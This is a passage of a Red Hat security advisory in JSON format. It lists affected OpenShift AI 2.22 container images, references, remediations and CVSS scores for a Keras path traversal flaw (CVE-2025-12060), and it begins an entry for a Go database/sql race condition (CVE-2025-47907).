"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "RHBZ#2407443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407443"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21760",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"release_date": "2025-10-30T17:10:43.868000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Keras Path Traversal Vulnerability"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
